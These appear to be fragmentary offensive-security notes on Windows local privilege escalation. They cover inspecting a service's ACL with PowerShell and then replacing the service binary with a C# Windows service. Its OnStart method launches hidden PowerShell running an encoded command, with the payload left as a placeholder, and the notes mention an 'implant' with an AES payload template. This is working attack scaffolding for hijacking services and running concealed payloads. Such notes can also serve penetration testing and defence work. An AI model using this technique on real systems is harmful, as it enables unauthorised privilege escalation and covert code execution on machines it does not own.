https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/
Viewing Service ACLs using powershell
Use the Get-ServiceACL script, and run:
'FakeService' | Get‐ServiceAcl | Select‐Object ‐ExpandProperty Access
If the service permissions allow us to start stop or change config we can modify the service permissions.
We can use visual studio to create a new service binary with the settings we want.
We need to start a new visual studio project which have the 'Windows Service (.net framework)' type, choose a name for our service project.
Press in the new windows on 'Service1.cs' and 'View Code'
And add this into the OnStart method to launch a powershell code
protected override void OnStart(string[] args)
{
var processStartInfo = new ProcessStartInfo
{
FileName = @"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
Arguments = @"‐Sta ‐Nop ‐Window Hidden ‐EncodedCommand <blah>"
};
var process = new Process
{
StartInfo = processStartInfo
};
process.Start();
process.WaitForExit();
process.Dispose();
}
Example can be found here:
https://docs.microsoft.com/en-us/dotnet/framework/windows-services/walkthrough-creating-a-windows-service-application-in-the-component-designer
Located in the LPE\\implant
folder under implantsrv.cpp
currently it only sleeps for 30 seconds, but he included the template for AES payload. compile using compileSrv.bat